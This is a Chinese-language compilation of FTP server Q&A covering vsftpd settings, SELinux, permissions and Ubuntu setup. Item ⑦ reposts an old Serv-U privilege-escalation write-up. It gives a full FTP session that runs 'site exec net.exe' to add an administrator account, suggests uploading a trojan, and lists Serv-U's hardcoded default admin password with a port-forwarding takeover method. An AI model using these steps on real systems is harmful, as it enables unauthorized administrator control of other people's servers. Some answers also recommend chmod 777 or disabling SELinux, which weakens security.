① ftp 怎樣修改apache 的配置文件
ftp 無法修改 apache 的配置文件。ftp 只是一個上傳文件的客戶端程序。常見的版本有:cuteftp、wsftp,等等。如果需要修改 apache 的配置文件,你可以使用 Linux 下的 vi 編輯程序對 apache 伺服器的配置文件進行修改。
② 採集伺服器採集下來文件無法通過FTP上傳到磁碟陣列中FTP的路徑沒有問題配置文件也沒問題。求高手指教
是採集軟體自動上傳ftp么,你先試一下手工能不能上傳,可能是ftp對文件大小有限制,也可能是ftp服務端的參數設置與你的上傳工具不兼容。
你最好說一下具體使用環境,還有故障表現。
③ linux ftp用戶無法上傳。
先看防火牆有沒有開放20和21埠,或者您先暫時關了
匿名用戶取得的身份是ftp 所以要匿名用戶上傳
要 chown ftp [目錄] (所屬用戶為ftp)
要 setsebool -P allow_ftpd-anon_write on
setsebool -P allow_ftpd-anon_full_access on
看是否有給vsftp共享目的需要給ftp組的寫入許可權,且此目的SELINUX的context值正確,,不對就restorecon,或者您直接關了
最後配置文件vsftpd.conf中有幾個項您檢查下:
anonymous_enable 允許匿名用戶
anon_world_readable_only 匿名用戶是否具有隻有下載可讀文件的許可權
anon_other_write_enbale 匿名用戶是否具有刪除文件,修改文件,修改文件名的許可權
anon_mkdir_write_enable 匿名用戶是否具有創建目錄的許可權
anon_upload_enable 匿名用戶是否具有上傳數據的功能
④ Linux中的FTP上傳許可權問題
這個很簡單,可能是你的FTP工作目錄中對於其他用戶沒有寫許可權,或者在配置文件當中沒有加上寫入許可權。linux中的各種服務對許可權的要求是很高的,都是以最嚴格的為准。
⑤ ftp沒有配置文件怎麼辦,我是在mips板子上搭建ftp的,可是板子系統中只有/tmp可寫,/etc中沒有配置文件
用tcpsvd -vE 0.0.0.0 21 ftpd .....
⑥ 我的FTP登陸失敗是怎麼回事
常見的FTP排錯方法
相比其他的服務而言,vsftp配置操作並不復雜,但因為管理員的疏忽,也會造成客戶端無法正常訪問FTP伺服器。本節將通過幾個常見錯誤,講解vsftp的排錯方法。
1.拒絕賬戶登錄(錯誤提示:OOPS無法改變目錄)。當客戶端使用ftp賬號登錄伺服器時,提示「500 OOPS」錯誤。
接收到該錯誤信息,其實並不是vsftpd.conf配置文件設置有問題,而重點是「cannot change directory」,無法更改目錄。造成這個錯誤,主要有以下兩個原因。①目錄許可權設置錯誤。該錯誤一般在本地賬戶登錄時發生,如果管理員在設置該賬戶主目錄許可權時,忘記添加執行許可權(X),那麼,就會收到該錯誤信息。FTP中的本地賬號,需要擁有目錄的執行許可權,請作用chmod命令添加「X」許可權,保證用戶能夠瀏覽目錄信息,否則拒絕登錄。對於FTP的虛擬賬號,即使不具備目錄的執行許可權,也可以登錄FTP伺服器,但會有其他錯誤提示。為了保證FTP用戶的正常訪問,請開戶目錄的執行許可權。②SELinux。FTP伺服器開啟了SELinux針對FTP數據傳輸的策略,也會造成「無法切換目錄」的錯誤提示,如果目錄許可權設置正確,那麼,需要檢查SELinux的配置。用戶可以通過setsebool命令,禁用SELinux的FTP傳輸審核功能。
[root@RHEL4~]# setsebool –P ftpd_disable_trans 1
重新啟動vsftpd服務,用戶能夠成功登錄FTP伺服器。
2.客戶端連接FTP伺服器超時。造成客戶端訪問伺服器超時的原因,主要有以下幾種情況。①線路不通。使用ping命令測試網路連通性,如果出現「Request Timed Out」,說明客戶端與伺服器的網路連接存在問題,檢查線路的故障。②防火牆設置。如果防火牆屏蔽了FTP伺服器控制埠21,以及其他的數據埠,則會造成客戶端無法連接伺服器,形成「超時」的錯誤提示。需要設置防火牆開放21埠,並且,還應該開啟主動模式的20埠,以及被動模式使用的埠范圍,防止數據的連接錯誤。
3.賬戶登錄失敗。客戶端登錄FTP伺服器時,還有可能會收到「登錄失敗」的錯誤提示。
登錄失敗,實際上牽扯到身份驗證,以及其他一些登錄的設置。①密碼錯誤。請保證登錄密碼的正確性,如果FTP伺服器更新了密碼設置,則使用新密碼重新登錄。②PAM維模塊。當輸入密碼無誤,但仍然無法登錄FTP伺服器時,很有可能是PAM模塊中vsftpd的配置文件錯誤造成的。PAM的配置比較復雜,其中auth欄位主要是接受用戶名和密碼,進而對該用戶的密碼進行認證,account欄位主要是檢查賬戶是否被允許登錄系統,賬戶是否已經過期,賬戶的登錄是否有時間段的限制等,保證這兩個欄位配置的正確性,否則FTP賬號將無法登錄伺服器。事實上,大部分賬號登錄失敗都是由這個錯誤造成的。③用戶目錄許可權。FTP賬號對於主目錄沒有任何許可權時,也會收到「登錄失敗」的錯誤提示,根據該賬號的用戶身份,重新設置其主目錄許可權,重啟vsftpd服務,使配置生效。
⑦ 求助:win2003下,Serv-u使用時候提示 無法寫入 ServUadmin.ini
Serv-U FTP Server為RhinoSoft出品的一款Ftp Server軟體,可運行在Microsoft Windows平台下。
ServUAdmin.exe是ftp server管理界面,由於ServUAdmin.exe對異常的不正確處理,導致在Serv-U被
注冊為系統服務的情況下,本地普通用戶進行許可權提升,得到超級用戶的許可權。遠程用普通用戶許可權,可
以通過3389登陸的也可以進行提升。
測試方法:
測試環境:
MICROSOFT WINDOWS 2000(SP4)+Serv-U FTP Server 4.0.0.4
MICROSOFT WINDOWS SERVER 2003, ENTERPRISE EDITION+Serv-U FTP Server 4.0.0.4
測試方法:
一、安裝Serv-U
以普通用戶登陸,許可權不夠,不能安裝,重新以administrator登陸安裝Serv-U(默認安裝,此時Serv-U
的啟動方式為自動啟動,已經注冊為系統服務),安裝好之後,啟動Serv-U,然後就注銷administrator。
二、提升許可權
用普通用戶登陸,進入Serv-U FTP Server的安裝目錄,運行ServUAdmin.exe,新建域,而且添加用戶,
新建用戶ftpuser,把主目錄設置為系統目錄C:,此時用戶ftpuser的許可權為R----L--I,將用戶許可權設置為
系統管理員,甚至更高級別的,或者將用戶對目錄的訪問許可權設置為讀寫刪除執行,跳出ServUAdmin.ini
不能寫入,ServUAdmin.exe同時以system許可權對ServUAdmin.ini進行改寫。這樣ftpuser通過ftp就具有了
對系統目錄的讀寫刪除執行的許可權。這樣就可以進行許可權提升了,你可以傳個木馬上去,再運行,或者直
接添加系統用戶。
ftp>open ip
Connected to ip.
220 Serv-U FTP Server v4.0 for WinSock ready...
User (ip:(none)): ftpuser //輸入ftp用戶
331 User name okay, please send complete E-mail address as password.
Password:password //密碼
230 User logged in, proceed.
ftp> cd winnt //進入win2k的winnt目錄,如果是winxp或者是win 2003就應該為windows目錄。
250 Directory changed to /WINNT
ftp>cd system32 //進入system32目錄
250 Directory changed to /WINNT/system32
ftp>quote site exec net.exe user cc cc /add //利用net命令添加用戶。
200 EXEC command successful (TID=33).
ftp>quote site exec net.exe localhost administrators cc /add //提升為超級用戶
漏洞分析
1、只能以administrator安裝Serv-U,其配置文件ServUDaemon.ini和ServUAdmin.ini。ntfs格式默認情
況普通用戶只具有讀和運行的許可權(默認情況下只有admin和system有寫許可權),無法通過對他們改寫來
提升許可權。
2、當Serv-U成為系統服務的時候,就具有了system的許可權,ServUAdmin.exe雖然進行了許可權驗證,但由
於對異常處理不正確,對ServUAdmin.ini進行了寫操作,從而導致了漏洞的產生。
感謝紫幻,沒有他那篇文章,我就不會打Serv-U的主意。
聲明
本本僅用來描述可能存在的安全問題,作者本人不為此安全公告提供任何保證或承諾。由於傳播、利用此
文章提供的信息而造成的任何直接或者間接的後果及損失,均由使用者本人負責,本文作者不為此承擔任
何責任。作者擁有對此安全公告的修改和解釋權。如欲轉載或傳播此文章,必須保證此文章的完整性,包
括版權聲明等全部內容。未經作者本人允許,不得任意修改或者增減此文章公告內容。
EYAS註:
serv-u默認監聽127.0.0.1:43958,所以只有在本機才能連接這個管理埠。
serv-u默認管理賬號是LocalAdministrator,默認密碼是"#l@$ak#.lk;0@P",這個密碼在同一個
版本中是固定的,也許在不同的版本中也是固定的。
假如目標機器IP是192.168.0.1,假如你已經有了一個目標機器的普通許可權的SHELL,那麼你
在目標機器上運行fpipe -v -l 12345 -r 43958 127.0.0.1,然後在你自己的機器,用"serv-u
admin"新建SERVER,
192.168.0.1:12345
User:LocalAdministrator
Pass:"#l@$ak#.lk;0@P"
,那麼目標機器的serv-u就歸你管了。
(不需要能終端或物理控制台登錄,只要有個shell,能運行埠數據轉發的程序就可以了)
注釋:————linuxjava
該漏洞已經很老了,但是這里貼出只是讓大家學習一種方法,和知曉一些原理。
突破serv-u應該是我們提升許可權用的最多的方法了,相信每一個熟悉提升許可權的hackboy都應該對serv-u的各個版本了如執掌了把?就象熟悉win的各個版本一樣。有條件的朋友可以安裝一個serv-u在自己的機子上試試。
⑧ linux ftp伺服器 如何修改配置文件
配置文件在:/etc/vsftpd/vsftpd.conf
參數
作用
listen=[YES|NO]
否以獨立運行的方式監聽服務。
listen_address=IP地址
設置要監聽的IP地址。
listen_port=21
設置FTP服務的監聽埠。
download_enable=[YES|NO]
是否允許下載文件。
userlist_enable=[YES|NO]
userlist_deny=[YES|NO]
是否啟用「禁止登陸用戶名單」。
max_clients=0
最大客戶端連接數,0為不限制。
max_per_ip=0
同一IP地址最大連接數,0位不限制。
anonymous_enable=[YES|NO]
是否允許匿名用戶訪問。
anon_upload_enable=[YES|NO]
是否允許匿名用戶上傳文件。
anon_umask=022
匿名用戶上傳文件的umask值。
anon_root=/var/ftp
匿名用戶的FTP根目錄。
anon_mkdir_write_enable=[YES|NO]
是否允許匿名用戶創建目錄。
anon_other_write_enable=[YES|NO]
是否開放匿名用戶其他寫入許可權。
anon_max_rate=0
匿名用戶最大傳輸速率(位元組),0為不限制。
local_enable=[YES|NO]
是否允許本地用戶登陸FTP。
local_umask=022
本地用戶上傳文件的umask值。
local_root=/var/ftp
本地用戶的FTP根目錄。
chroot_local_user=[YES|NO]
是否將用戶許可權禁錮在FTP目錄,更加的安全。
local_max_rate=0
本地用戶最大傳輸速率(位元組),0為不限制。
⑨ 如何在ubuntu中安裝設置ftp伺服器
1、更新軟體源,保證源是最新的,這樣有利於下面在線通過apt-get install命令安裝ftp。
2、使用sudo apt-get install vsftp命令安裝vsftp,安裝軟體需要root許可權,我們使用sudo來暫時獲取。
3、安裝好ftp後默認是會自動創建ftp用戶的,然後設置ftp用戶的密碼,輸入sudo passwd ftp,然後輸入密碼,再確認密碼。
4、創建ftp用戶的家目錄,使用sudo mkdir /home/ftp命令
5、設置ftp家目錄的許可權,我這里為方便直接使用sudo chmod 777 /home/ftp命令將許可權設置為777,當然你可以根據自己需求進行設置。
6、對/etc/vsftpd.conf配置文件進行一定的修改。使用 sudo gedit /etc/vsftpd.conf打開配置文件,如果你喜歡vi或vim編輯器也可以使用它們打開。
7、將配置文件中」anonymous_enable=YES 「改為 「anonymous_enable=NO」(是否允許匿名ftp,若不允許選NO)
取消如下配置前的注釋符號:
local_enable=YES(是否允許本地用戶登錄)
write_enable=YES(是否允許本地用戶寫的許可權)
chroot_local_user=YES(是否將所有用戶限制在主目錄)
chroot_list_enable=YES(是否啟動限制用戶的名單)
chroot_list_file=/etc/vsftpd.chroot_list(可在文件中設置多個賬號)
8、然後重啟ftp服務,使用命令sudo service vsftpd restart重啟ftp服務。
9、測試ftp,復制一些文件到/home/ftp目錄下
方法一:在瀏覽器中輸入ftp://localhost,網頁登錄。
方法二:在終端中輸入ftp localhost,然後輸入用戶名與密碼實現登錄。
另外:如果登錄ftp總是出現密碼錯誤,可以將/etc/vsftpd.conf配置文件的pam_service_name=vsftpd改為pam_service_name=ftp,即可解決。
⑩ 在虛擬機linux下的搭建的ftp伺服器,可以下載,但是無法上傳,具體應該怎麼設置那個主配置文件
很可能是字元編碼不一致導致的。LINUX一般用UTF-8,中文WINDOWS一般是GBK或其它。
在FTP客戶端設置編碼為UTF-8試試看。